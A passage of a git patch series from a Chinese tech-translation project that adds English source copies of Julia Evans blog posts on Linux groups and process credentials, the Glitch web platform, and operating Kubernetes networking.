https://blog.jupyter.org/interactive-workflows-for-c-with-jupyter-fe9b54227d92 + +作者:[QuantStack ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.jupyter.org/@QuantStack?source=post_header_lockup +[1]:https://github.com/bloomberg/bqplot +[2]:https://github.com/jovyan/pythreejs +[3]:https://github.com/ellisonbg/ipyleaflet +[4]:https://github.com/maartenbreddels/ipyvolume +[5]:https://github.com/arose/nglview +[6]:https://github.com/QuantStack/xtensor-blas +[7]:https://github.com/egpbos/xtensor-fftw +[8]:http://www.fftw.org/ +[9]:https://github.com/QuantStack/xtensor-io +[10]:https://github.com/wolfv/xtensor_ros +[11]:https://github.com/QuantStack/xtensor-python +[12]:https://github.com/QuantStack/Xtensor.jl +[13]:https://github.com/QuantStack/xtensor-r +[14]:https://github.com/jupyter/jupyter/wiki/Jupyter-kernels +[15]:https://github.com/ipython/ipykernel +[16]:https://github.com/JuliaLang/IJulia.jl +[17]:https://github.com/QuantStack/xeus +[18]:https://root.cern.ch/cling +[19]:https://root.cern.ch/ +[20]:https://github.com/QuantStack/xeus-cling +[21]:http://en.cppreference.com/w/ +[22]:http://jupyter.org/widgets +[23]:https://github.com/QUantStack/xwidgets +[24]:https://github.com/QuantStack/xplot +[25]:https://github.com/bloomberg/bqplot +[26]:https://dl.acm.org/citation.cfm?id=1088896 +[27]:http://www.numpy.org/ +[28]:https://pandas.pydata.org/ +[29]:https://github.com/QuantStack/xtensor/ +[30]:http://xtensor.readthedocs.io/en/latest/numpy.html +[31]:https://mybinder.org/ +[32]:https://beta.mybinder.org/v2/gh/QuantStack/xtensor/0.14.0-binder2?filepath=notebooks/xtensor.ipynb +[33]:https://beta.mybinder.org/v2/gh/QuantStack/xwidgets/0.6.0-binder?filepath=notebooks/xwidgets.ipynb +[34]:https://beta.mybinder.org/v2/gh/QuantStack/xplot/0.3.0-binder?filepath=notebooks +[35]:https://github.com/jupyterhub/jupyterhub +[36]:http://nicolas.thiery.name/Enseignement/Info111/ +[37]:https://twitter.com/egpbos +[38]:http://diana-hep.org/ +[39]:https://twitter.com/pyviv +[40]:https://twitter.com/QuantStack +[41]:http://www.techatbloomberg.com/ +[42]:https://twitter.com/SylvainCorlay +[43]:https://github.com/QuantStack/ +[44]:https://twitter.com/lgouarin +[45]:https://www.math.u-psud.fr/ +[46]:https://twitter.com/johanmabille?lang=en +[47]:https://github.com/QuantStack/ +[48]:https://twitter.com/wuoulf +[49]:https://github.com/QuantStack/ +[50]:https://medium.com/@maartenbreddels?source=post_page +[51]:https://medium.com/@wolfv?source=post_page +[52]:https://medium.com/@ellisonbg?source=post_page +[53]:https://medium.com/@egpbos?source=post_page From bcb3b04a0a049743df212d0f866099ee4bee3519 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:20:55 +0800 Subject: [PATCH 0182/1627] =?UTF-8?q?20171203-17=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171203 How do groups work on Linux.md | 141 ++++++++++++++++++ 1 file changed, 141 insertions(+) create mode 100644 sources/tech/20171203 How do groups work on Linux.md diff --git a/sources/tech/20171203 How do groups work on Linux.md b/sources/tech/20171203 How do groups work on Linux.md new file mode 100644 index 0000000000..503f83d1d9 --- /dev/null +++ b/sources/tech/20171203 How do groups work on Linux.md @@ -0,0 +1,141 @@ +How do groups work on Linux? +============================================================ + +Hello! Last week, I thought I knew how users and groups worked on Linux. Here is what I thought: + +1. Every process belongs to a user (like `julia`) + +2. When a process tries to read a file owned by a group, Linux a) checks if the user `julia` can access the file, and b) checks which groups `julia` belongs to, and whether any of those groups owns & can access that file + +3. If either of those is true (or if the ‘any’ bits are set right) then the process can access the file + +So, for example, if a process is owned by the `julia` user and `julia` is in the `awesome`group, then the process would be allowed to read this file. + +``` +r--r--r-- 1 root awesome 6872 Sep 24 11:09 file.txt + +``` + +I had not thought carefully about this, but if pressed I would have said that it probably checks the `/etc/group` file at runtime to see what groups you’re in. + +### that is not how groups work + +I found out at work last week that, no, what I describe above is not how groups work. In particular Linux does **not** check which groups a process’s user belongs to every time that process tries to access a file. + +Here is how groups actually work! I learned this by reading Chapter 9 (“Process Credentials”) of [The Linux Programming Interface][1] which is an incredible book. As soon as I realized that I did not understand how users and groups worked, I opened up the table of contents with absolute confidence that it would tell me what’s up, and I was right. + +### how users and groups checks are done + +They key new insight for me was pretty simple! The chapter starts out by saying that user and group IDs are **attributes of the process**: + +* real user ID and group ID; + +* effective user ID and group ID; + +* saved set-user-ID and saved set-group-ID; + +* file-system user ID and group ID (Linux-specific); and + +* supplementary group IDs. + +This means that the way Linux **actually** does group checks to see a process can read a file is: + +* look at the process’s group IDs & supplementary group IDs (from the attributes on the process, **not** by looking them up in `/etc/group`) + +* look at the group on the file + +* see if they match + +Generally when doing access control checks it uses the **effective** user/group ID, not the real user/group ID. Technically when accessing a file it actually uses the **file-system** ids but those are usually the same as the effective uid/gid. + +### Adding a user to a group doesn’t put existing processes in that group + +Here’s another fun example that follows from this: if I create a new `panda` group and add myself (bork) to it, then run `groups` to check my group memberships – I’m not in the panda group! + +``` +bork@kiwi~> sudo addgroup panda +Adding group `panda' (GID 1001) ... +Done. +bork@kiwi~> sudo adduser bork panda +Adding user `bork' to group `panda' ... +Adding user bork to group panda +Done. +bork@kiwi~> groups +bork adm cdrom sudo dip plugdev lpadmin sambashare docker lxd + +``` + +no `panda` in that list! To double check, let’s try making a file owned by the `panda`group and see if I can access it: + +``` +$ touch panda-file.txt +$ sudo chown root:panda panda-file.txt +$ sudo chmod 660 panda-file.txt +$ cat panda-file.txt +cat: panda-file.txt: Permission denied + +``` + +Sure enough, I can’t access `panda-file.txt`. No big surprise there. My shell didn’t have the `panda` group as a supplementary GID before, and running `adduser bork panda` didn’t do anything to change that. + +### how do you get your groups in the first place? + +So this raises kind of a confusing question, right – if processes have groups baked into them, how do you get assigned your groups in the first place? Obviously you can’t assign yourself more groups (that would defeat the purpose of access control). + +It’s relatively clear how processes I **execute** from my shell (bash/fish) get their groups – my shell runs as me, and it has a bunch of group IDs on it. Processes I execute from my shell are forked from the shell so they get the same groups as the shell had. + +So there needs to be some “first” process that has your groups set on it, and all the other processes you set inherit their groups from that. That process is called your **login shell**and it’s run by the `login` program (`/bin/login`) on my laptop. `login` runs as root and calls a C function called `initgroups` to set up your groups (by reading `/etc/group`). It’s allowed to set up your groups because it runs as root. + +### let’s try logging in again! + +So! Let’s say I am running in a shell, and I want to refresh my groups! From what we’ve learned about how groups are initialized, I should be able to run `login` to refresh my groups and start a new login shell! + +Let’s try it: + +``` +$ sudo login bork +$ groups +bork adm cdrom sudo dip plugdev lpadmin sambashare docker lxd panda +$ cat panda-file.txt # it works! I can access the file owned by `panda` now! + +``` + +Sure enough, it works! Now the new shell that `login` spawned is part of the `panda`group! Awesome! This won’t affect any other shells I already have running. If I really want the new `panda` group everywhere, I need to restart my login session completely, which means quitting my window manager and logging in again. + +### newgrp + +Somebody on Twitter told me that if you want to start a new shell with a new group that you’ve been added to, you can use `newgrp`. Like this: + +``` +sudo addgroup panda +sudo adduser bork panda +newgrp panda # starts a new shell, and you don't have to be root to run it! + +``` + +You can accomplish the same(ish) thing with `sg panda bash` which will start a `bash`shell that runs with the `panda` group. + +### setuid sets the effective user ID + +I’ve also always been a little vague about what it means for a process to run as “setuid root”. It turns out that setuid sets the effective user ID! So if I (`julia`) run a setuid root process (like `passwd`), then the **real** user ID will be set to `julia`, and the **effective** user ID will be set to `root`. + +`passwd` needs to run as root, but it can look at its real user ID to see that `julia` started the process, and prevent `julia` from editing any passwords except for `julia`’s password. + +### that’s all! + +There are a bunch more details about all the edge cases and exactly how everything works in The Linux Programming Interface so I will not get into all the details here. That book is amazing. Everything I talked about in this post is from Chapter 9, which is a 17-page chapter inside a 1300-page book. + +The thing I love most about that book is that reading 17 pages about how users and groups work is really approachable, self-contained, super useful, and I don’t have to tackle all 1300 pages of it at once to learn helpful things :) + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/11/20/groups/ + +作者:[Julia Evans ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:http://man7.org/tlpi/ From b2f7a3953dab5943e4c03d808aa4acaceb6a06b9 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:23:24 +0800 Subject: [PATCH 0183/1627] =?UTF-8?q?20171203-18=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... write fun small web projects instantly.md | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 sources/tech/20171113 Glitch write fun small web projects instantly.md diff --git a/sources/tech/20171113 Glitch write fun small web projects instantly.md b/sources/tech/20171113 Glitch write fun small web projects instantly.md new file mode 100644 index 0000000000..bfed5b9a0b --- /dev/null +++ b/sources/tech/20171113 Glitch write fun small web projects instantly.md @@ -0,0 +1,74 @@ +Glitch: write fun small web projects instantly +============================================================ + +I just wrote about Jupyter Notebooks which are a fun interactive way to write Python code. That reminded me I learned about Glitch recently, which I also love!! I built a small app to [turn of twitter retweets][2] with it. So! + +[Glitch][3] is an easy way to make Javascript webapps. (javascript backend, javascript frontend) + +The fun thing about glitch is: + +1. you start typing Javascript code into their web interface + +2. as soon as you type something, it automagically reloads the backend of your website with the new code. You don’t even have to save!! It autosaves. + +So it’s like Heroku, but even more magical!! Coding like this (you type, and the code runs on the public internet immediately) just feels really **fun** to me. + +It’s kind of like sshing into a server and editing PHP/HTML code on your server and having it instantly available, which I kind of also loved. Now we have “better deployment practices” than “just edit the code and it is instantly on the internet” but we are not talking about Serious Development Practices, we are talking about writing tiny programs for fun. + +### glitch has awesome example apps + +Glitch seems like fun nice way to learn programming! + +For example, there’s a space invaders game (code by [Mary Rose Cook][4]) at [https://space-invaders.glitch.me/][5]. The thing I love about this is that in just a few clicks I can + +1. click “remix this” + +2. start editing the code to make the boxes orange instead of black + +3. have my own space invaders game!! Mine is at [http://julias-space-invaders.glitch.me/][1]. (i just made very tiny edits to make it orange, nothing fancy) + +They have tons of example apps that you can start from – for instance [bots][6], [games][7], and more. + +### awesome actually useful app: tweetstorms + +The way I learned about Glitch was from this app which shows you tweetstorms from a given user: [https://tweetstorms.glitch.me/][8]. + +For example, you can see [@sarahmei][9]’s tweetstorms at [https://tweetstorms.glitch.me/sarahmei][10] (she tweets a lot of good tweetstorms!). + +### my glitch app: turn off retweets + +When I learned about Glitch I wanted to turn off retweets for everyone I follow on Twitter (I know you can do it in Tweetdeck!) and doing it manually was a pain – I had to do it one person at a time. So I wrote a tiny Glitch app to do it for me! + +I liked that I didn’t have to set up a local development environment, I could just start typing and go! + +Glitch only supports Javascript and I don’t really know Javascript that well (I think I’ve never written a Node program before), so the code isn’t awesome. But I had a really good time writing it – being able to type and just see my code running instantly was delightful. Here it is: [https://turn-off-retweets.glitch.me/][11]. + +### that’s all! + +Using Glitch feels really fun and democratic. Usually if I want to fork someone’s web project and make changes I wouldn’t do it – I’d have to fork it, figure out hosting, set up a local dev environment or Heroku or whatever, install the dependencies, etc. I think tasks like installing node.js dependencies used to be interesting, like “cool i am learning something new” and now I just find them tedious. + +So I love being able to just click “remix this!” and have my version on the internet instantly. + + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/11/13/glitch--write-small-web-projects-easily/ + +作者:[Julia Evans ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/ +[1]:http://julias-space-invaders.glitch.me/ +[2]:https://turn-off-retweets.glitch.me/ +[3]:https://glitch.com/ +[4]:https://maryrosecook.com/ +[5]:https://space-invaders.glitch.me/ +[6]:https://glitch.com/handy-bots +[7]:https://glitch.com/games +[8]:https://tweetstorms.glitch.me/ +[9]:https://twitter.com/sarahmei +[10]:https://tweetstorms.glitch.me/sarahmei +[11]:https://turn-off-retweets.glitch.me/ From cb6e94e201f96d7b4f16dedb4cdfd12ae7c17e80 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:25:02 +0800 Subject: [PATCH 0184/1627] =?UTF-8?q?20171203-19=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...71010 \tOperating a Kubernetes network.md" | 216 ++++++++++++++++++ 1 file changed, 216 insertions(+) create mode 100644 "sources/tech/20171010 \tOperating a Kubernetes network.md" diff --git "a/sources/tech/20171010 \tOperating a Kubernetes network.md" "b/sources/tech/20171010 \tOperating a Kubernetes network.md" new file mode 100644 index 0000000000..9c85e9aa70 --- /dev/null +++ "b/sources/tech/20171010 \tOperating a Kubernetes network.md" @@ -0,0 +1,216 @@ +Operating a Kubernetes network +============================================================ + +I’ve been working on Kubernetes networking a lot recently. One thing I’ve noticed is, while there’s a reasonable amount written about how to **set up** your Kubernetes network, I haven’t seen much about how to **operate** your network and be confident that it won’t create a lot of production incidents for you down the line. + +In this post I’m going to try to convince you of three things: (all I think pretty reasonable :)) + +* Avoiding networking outages in production is important + +* Operating networking software is hard + +* It’s worth thinking critically about major changes to your networking infrastructure and the impact that will have on your reliability, even if very fancy Googlers say “this is what we do at Google”. (google engineers are doing great work on Kubernetes!! But I think it’s important to still look at the architecture and make sure it makes sense for your organization.) + +I’m definitely not a Kubernetes networking expert by any means, but I have run into a few issues while setting things up and definitely know a LOT more about Kubernetes networking than I used to. + +### Operating networking software is hard + +Here I’m not talking about operating physical networks (I don’t know anything about that), but instead about keeping software like DNS servers & load balancers & proxies working correctly. + +I have been working on a team that’s responsible for a lot of networking infrastructure for a year, and I have learned a few things about operating networking infrastructure! (though I still have a lot to learn obviously). 3 overall thoughts before we start: + +* Networking software often relies very heavily on the Linux kernel. So in addition to configuring the software correctly you also need to make sure that a bunch of different sysctls are set correctly, and a misconfigured sysctl can easily be the difference between “everything is 100% fine” and “everything is on fire”. + +* Networking requirements change over time (for example maybe you’re doing 5x more DNS lookups than you were last year! Maybe your DNS server suddenly started returning TCP DNS responses instead of UDP which is a totally different kernel workload!). This means software that was working fine before can suddenly start having issues. + +* To fix a production networking issues you often need a lot of expertise. (for example see this [great post by Sophie Haskins on debugging a kube-dns issue][1]) I’m a lot better at debugging networking issues than I was, but that’s only after spending a huge amount of time investing in my knowledge of Linux networking. + +I am still far from an expert at networking operations but I think it seems important to: + +1. Very rarely make major changes to the production networking infrastructure (because it’s super disruptive) + +2. When you  _are_  making major changes, think really carefully about what the failure modes are for the new network architecture are + +3. Have multiple people who are able to understand your networking setup + +Switching to Kubernetes is obviously a pretty major networking change! So let’s talk about what some of the things that can go wrong are! + +### Kubernetes networking components + +The Kubernetes networking components we’re going to talk about in this post are: + +* Your overlay network backend (like flannel/calico/weave net/romana) + +* `kube-dns` + +* `kube-proxy` + +* Ingress controllers / load balancers + +* The `kubelet` + +If you’re going to set up HTTP services you probably need all of these. I’m not using most of these components yet but I’m trying to understand them, so that’s what this post is about. + +### The simplest way: Use host networking for all your containers + +Let’s start with the simplest possible thing you can do. This won’t let you run HTTP services in Kubernetes. I think it’s pretty safe because there are less moving parts. + +If you use host networking for all your containers I think all you need to do is: + +1. Configure the kubelet to configure DNS correctly inside your containers + +2. That’s it + +If you use host networking for literally every pod you don’t need kube-dns or kube-proxy. You don’t even need a working overlay network. + +In this setup your pods can connect to the outside world (the same way any process on your hosts would talk to the outside world) but the outside world can’t connect to your pods. + +This isn’t super important (I think most people want to run HTTP services inside Kubernetes and actually communicate with those services) but I do think it’s interesting to realize that at some level all of this networking complexity isn’t strictly required and sometimes you can get away without using it. Avoiding networking complexity seems like a good idea to me if you can. + +### Operating an overlay network + +The first networking component we’re going to talk about is your overlay network. Kubernetes assumes that every pod has an IP address and that you can communicate with services inside that pod by using that IP address. When I say “overlay network” this is what I mean (“the system that lets you refer to a pod by its IP address”). + +All other Kubernetes networking stuff relies on the overlay networking working correctly. You can read more about the [kubernetes networking model here][10]. + +The way Kelsey Hightower describes in [kubernetes the hard way][11] seems pretty good but it’s not really viable on AWS for clusters more than 50 nodes or so, so I’m not going to talk about that. + +There are a lot of overlay network backends (calico, flannel, weaveworks, romana) and the landscape is pretty confusing. But as far as I’m concerned an overlay network has 2 responsibilities: + +1. Make sure your pods can send network requests outside your cluster + +2. Keep a stable mapping of nodes to subnets and keep every node in your cluster updated with that mapping. Do the right thing when nodes are added & removed. + +Okay! So! What can go wrong with your overlay network? + +* The overlay network is responsible for setting up iptables rules (basically `iptables -A -t nat POSTROUTING -s $SUBNET -j MASQUERADE`) to ensure that containers can make network requests outside Kubernetes. If something goes wrong with this rule then your containers can’t connect to the external network. This isn’t that hard (it’s just a few iptables rules) but it is important. I made a [pull request][2] because I wanted to make sure this was resilient + +* Something can go wrong with adding or deleting nodes. We’re using the flannel hostgw backend and at the time we started using it, node deletion [did not work][3]. + +* Your overlay network is probably dependent on a distributed database (etcd). If that database has an incident, this can cause issues. For example [https://github.com/coreos/flannel/issues/610][4] says that if you have data loss in your flannel etcd cluster it can result in containers losing network connectivity. (this has now been fixed) + +* You upgrade Docker and everything breaks + +* Probably more things! + +I’m mostly talking about past issues in Flannel here but I promise I’m not picking on Flannel – I actually really **like** Flannel because I feel like it’s relatively simple (for instance the [vxlan backend part of it][12] is like 500 lines of code) and I feel like it’s possible for me to reason through any issues with it. And it’s obviously continuously improving. They’ve been great about reviewing pull requests. + +My approach to operating an overlay network so far has been: + +* Learn how it works in detail and how to debug it (for example the hostgw network backend for Flannel works by creating routes, so you mostly just need to do `sudo ip route list` to see whether it’s doing the correct thing) + +* Maintain an internal build so it’s easy to patch it if needed + +* When there are issues, contribute patches upstream + +I think it’s actually really useful to go through the list of merged PRs and see bugs that have been fixed in the past – it’s a bit time consuming but is a great way to get a concrete list of kinds of issues other people have run into. + +It’s possible that for other people their overlay networks just work but that hasn’t been my experience and I’ve heard other folks report similar issues. If you have an overlay network setup that is a) on AWS and b) works on a cluster more than 50-100 nodes where you feel more confident about operating it I would like to know. + +### Operating kube-proxy and kube-dns? + +Now that we have some thoughts about operating overlay networks, let’s talk about + +There’s a question mark next to this one because I haven’t done this. Here I have more questions than answers. + +Here’s how Kubernetes services work! A service is a collection of pods, which each have their own IP address (like 10.1.0.3, 10.2.3.5, 10.3.5.6) + +1. Every Kubernetes service gets an IP address (like 10.23.1.2) + +2. `kube-dns` resolves Kubernetes service DNS names to IP addresses (so my-svc.my-namespace.svc.cluster.local might map to 10.23.1.2) + +3. `kube-proxy` sets up iptables rules in order to do random load balancing between them. Kube-proxy also has a userspace round-robin load balancer but my impression is that they don’t recommend using it. + +So when you make a request to `my-svc.my-namespace.svc.cluster.local`, it resolves to 10.23.1.2, and then iptables rules on your local host (generated by kube-proxy) redirect it to one of 10.1.0.3 or 10.2.3.5 or 10.3.5.6 at random. + +Some things that I can imagine going wrong with this: + +* `kube-dns` is misconfigured + +* `kube-proxy` dies and your iptables rules don’t get updated + +* Some issue related to maintaining a large number of iptables rules + +Let’s talk about the iptables rules a bit, since doing load balancing by creating a bajillion iptables rules is something I had never heard of before! + +kube-proxy creates one iptables rule per target host like this: (these rules are from [this github issue][13]) + +``` +-A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.20000000019 -j KUBE-SEP-E4QKA7SLJRFZZ2DD[b][c] +-A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.25000000000 -j KUBE-SEP-LZ7EGMG4DRXMY26H +-A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.33332999982 -j KUBE-SEP-RKIFTWKKG3OHTTMI +-A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -m statistic --mode random --probability 0.50000000000 -j KUBE-SEP-CGDKBCNM24SZWCMS +-A KUBE-SVC-LI77LBOOMGYET5US -m comment --comment "default/showreadiness:showreadiness" -j KUBE-SEP-RI4SRNQQXWSTGE2Y + +``` + +So kube-proxy creates a **lot** of iptables rules. What does that mean? What are the implications of that in for my network? There’s a great talk from Huawei called [Scale Kubernetes to Support 50,000 services][14] that says if you have 5,000 services in your kubernetes cluster, it takes **11 minutes** to add a new rule. If that happened to your real cluster I think it would be very bad. + +I definitely don’t have 5,000 services in my cluster, but 5,000 isn’t SUCH a bit number. The proposal they give to solve this problem is to replace this iptables backend for kube-proxy with IPVS which is a load balancer that lives in the Linux kernel. + +It seems like kube-proxy is going in the direction of various Linux kernel based load balancers. I think this is partly because they support UDP load balancing, and other load balancers (like HAProxy) don’t support UDP load balancing. + +But I feel comfortable with HAProxy! Is it possible to replace kube-proxy with HAProxy! I googled this and I found this [thread on kubernetes-sig-network][15] saying: + +> kube-proxy is so awesome, we have used in production for almost a year, it works well most of time, but as we have more and more services in our cluster, we found it was getting hard to debug and maintain. There is no iptables expert in our team, we do have HAProxy&LVS experts, as we have used these for several years, so we decided to replace this distributed proxy with a centralized HAProxy. I think this maybe useful for some other people who are considering using HAProxy with kubernetes, so we just update this project and make it open source: [https://github.com/AdoHe/kube2haproxy][5]. If you found it’s useful , please take a look and give a try. + +So that’s an interesting option! I definitely don’t have answers here, but, some thoughts: + +* Load balancers are complicated + +* DNS is also complicated + +* If you already have a lot of experience operating one kind of load balancer (like HAProxy), it might make sense to do some extra work to use that instead of starting to use an entirely new kind of load balancer (like kube-proxy) + +* I’ve been thinking about where we want to be using kube-proxy or kube-dns at all – I think instead it might be better to just invest in Envoy and rely entirely on Envoy for all load balancing & service discovery. So then you just need to be good at operating Envoy. + +As you can see my thoughts on how to operate your Kubernetes internal proxies are still pretty confused and I’m still not super experienced with them. It’s totally possible that kube-proxy and kube-dns are fine and that they will just work fine but I still find it helpful to think through what some of the implications of using them are (for example “you can’t have 5,000 Kubernetes services”). + +### Ingress + +If you’re running a Kubernetes cluster, it’s pretty likely that you actually need HTTP requests to get into your cluster so far. This blog post is already too long and I don’t know much about ingress yet so we’re not going to talk about that. + +### Useful links + +A couple of useful links, to summarize: + +* [The Kubernetes networking model][6] + +* How GKE networking works: [https://www.youtube.com/watch?v=y2bhV81MfKQ][7] + +* The aforementioned talk on `kube-proxy` performance: [https://www.youtube.com/watch?v=4-pawkiazEg][8] + +### I think networking operations is important + +My sense of all this Kubernetes networking software is that it’s all still quite new and I’m not sure we (as a community) really know how to operate all of it well. This makes me worried as an operator because I really want my network to keep working! :) Also I feel like as an organization running your own Kubernetes cluster you need to make a pretty large investment into making sure you understand all the pieces so that you can fix things when they break. Which isn’t a bad thing, it’s just a thing. + +My plan right now is just to keep learning about how things work and reduce the number of moving parts I need to worry about as much as possible. + +As usual I hope this was helpful and I would very much like to know what I got wrong in this post! + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/10/10/operating-a-kubernetes-network/ + +作者:[Julia Evans ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:http://blog.sophaskins.net/blog/misadventures-with-kube-dns/ +[2]:https://github.com/coreos/flannel/pull/808 +[3]:https://github.com/coreos/flannel/pull/803 +[4]:https://github.com/coreos/flannel/issues/610 +[5]:https://github.com/AdoHe/kube2haproxy +[6]:https://kubernetes.io/docs/concepts/cluster-administration/networking/#kubernetes-model +[7]:https://www.youtube.com/watch?v=y2bhV81MfKQ +[8]:https://www.youtube.com/watch?v=4-pawkiazEg +[9]:https://jvns.ca/categories/kubernetes +[10]:https://kubernetes.io/docs/concepts/cluster-administration/networking/#kubernetes-model +[11]:https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/master/docs/11-pod-network-routes.md +[12]:https://github.com/coreos/flannel/tree/master/backend/vxlan +[13]:https://github.com/kubernetes/kubernetes/issues/37932 +[14]:https://www.youtube.com/watch?v=4-pawkiazEg +[15]:https://groups.google.com/forum/#!topic/kubernetes-sig-network/3NlBVbTUUU0 From 04548977807f160d3b53b1cd2c2adfdaab9ec928 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:27:45 +0800 Subject: [PATCH 0185/1627] =?UTF-8?q?20171203-19=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171005 Reasons Kubernetes is cool.md | 148 ++++++++++++++++++ 1 file changed, 148 insertions(+) create mode 100644 sources/tech/20171005 Reasons Kubernetes is cool.md diff --git a/sources/tech/20171005 Reasons Kubernetes is cool.md b/sources/tech/20171005 Reasons Kubernetes is cool.md new file mode 100644 index 0000000000..a9d10b9cdb --- /dev/null +++ b/sources/tech/20171005 Reasons Kubernetes is cool.md @@ -0,0 +1,148 @@ +Reasons Kubernetes is cool +============================================================ + +When I first learned about Kubernetes (a year and a half ago?) I really didn’t understand why I should care about it. + +I’ve been working full time with Kubernetes for 3 months or so and now have some thoughts about why I think it’s useful. (I’m still very far from being a Kubernetes expert!) Hopefully this will help a little in your journey to understand what even is going on with Kubernetes! + +I will try to explain some reason I think Kubenetes is interesting without using the words “cloud native”, “orchestration”, “container”, or any Kubernetes-specific terminology :). I’m going to explain this mostly from the perspective of a kubernetes operator / infrastructure engineer, since my job right now is to set up Kubernetes and make it work well. + +I’m not going to try to address the question of “should you use kubernetes for your production systems?” at all, that is a very complicated question. (not least because “in production” has totally different requirements depending on what you’re doing) + +### Kubernetes lets you run code in production without setting up new servers + +The first pitch I got for Kubernetes was the following conversation with my partner Kamal: + +Here’s an approximate transcript: + +* Kamal: With Kubernetes you can set up a new service with a single command + +* Julia: I don’t understand how that’s possible. + +* Kamal: Like, you just write 1 configuration file, apply it, and then you have a HTTP service running in production + +* Julia: But today I need to create new AWS instances, write a puppet manifest, set up service discovery, configure my load balancers, configure our deployment software, and make sure DNS is working, it takes at least 4 hours if nothing goes wrong. + +* Kamal: Yeah. With Kubernetes you don’t have to do any of that, you can set up a new HTTP service in 5 minutes and it’ll just automatically run. As long as you have spare capacity in your cluster it just works! + +* Julia: There must be a trap + +There kind of is a trap, setting up a production Kubernetes cluster is (in my experience) is definitely not easy. (see [Kubernetes The Hard Way][3] for what’s involved to get started). But we’re not going to go into that right now! + +So the first cool thing about Kubernetes is that it has the potential to make life way easier for developers who want to deploy new software into production. That’s cool, and it’s actually true, once you have a working Kubernetes cluster you really can set up a production HTTP service (“run 5 of this application, set up a load balancer, give it this DNS name, done”) with just one configuration file. It’s really fun to see. + +### Kubernetes gives you easy visibility & control of what code you have running in production + +IMO you can’t understand Kubernetes without understanding etcd. So let’s talk about etcd! + +Imagine that I asked you today “hey, tell me every application you have running in production, what host it’s running on, whether it’s healthy or not, and whether or not it has a DNS name attached to it”. I don’t know about you but I would need to go look in a bunch of different places to answer this question and it would take me quite a while to figure out. I definitely can’t query just one API. + +In Kubernetes, all the state in your cluster – applications running (“pods”), nodes, DNS names, cron jobs, and more – is stored in a single database (etcd). Every Kubernetes component is stateless, and basically works by + +* Reading state from etcd (eg “the list of pods assigned to node 1”) + +* Making changes (eg “actually start running pod A on node 1”) + +* Updating the state in etcd (eg “set the state of pod A to ‘running’”) + +This means that if you want to answer a question like “hey, how many nginx pods do I have running right now in that availabliity zone?” you can answer it by querying a single unified API (the Kubernetes API!). And you have exactly the same access to that API that every other Kubernetes component does. + +This also means that you have easy control of everything running in Kubernetes. If you want to, say, + +* Implement a complicated custom rollout strategy for deployments (deploy 1 thing, wait 2 minutes, deploy 5 more, wait 3.7 minutes, etc) + +* Automatically [start a new webserver][1] every time a branch is pushed to github + +* Monitor all your running applications to make sure all of them have a reasonable cgroups memory limit + +all you need to do is to write a program that talks to the Kubernetes API. (a “controller”) + +Another very exciting thing about the Kubernetes API is that you’re not limited to just functionality that Kubernetes provides! If you decide that you have your own opinions about how your software should be deployed / created / monitored, then you can write code that uses the Kubernetes API to do it! It lets you do everything you need. + +### If every Kubernetes component dies, your code will still keep running + +One thing I was originally promised (by various blog posts :)) about Kubernetes was “hey, if the Kubernetes apiserver and everything else dies, it’s ok, your code will just keep running”. I thought this sounded cool in theory but I wasn’t sure if it was actually true. + +So far it seems to be actually true! + +I’ve been through some etcd outages now, and what happens is + +1. All the code that was running keeps running + +2. Nothing  _new_  happens (you can’t deploy new code or make changes, cron jobs will stop working) + +3. When everything comes back, the cluster will catch up on whatever it missed + +This does mean that if etcd goes down and one of your applications crashes or something, it can’t come back up until etcd returns. + +### Kubernetes’ design is pretty resilient to bugs + +Like any piece of software, Kubernetes has bugs. For example right now in our cluster the controller manager has a memory leak, and the scheduler crashes pretty regularly. Bugs obviously aren’t good but so far I’ve found that Kubernetes’ design helps mitigate a lot of the bugs in its core components really well. + +If you restart any component, what happens is: + +* It reads all its relevant state from etcd + +* It starts doing the necessary things it’s supposed to be doing based on that state (scheduling pods, garbage collecting completed pods, scheduling cronjobs, deploying daemonsets, whatever) + +Because all the components don’t keep any state in memory, you can just restart them at any time and that can help mitigate a variety of bugs. + +For example! Let’s say you have a 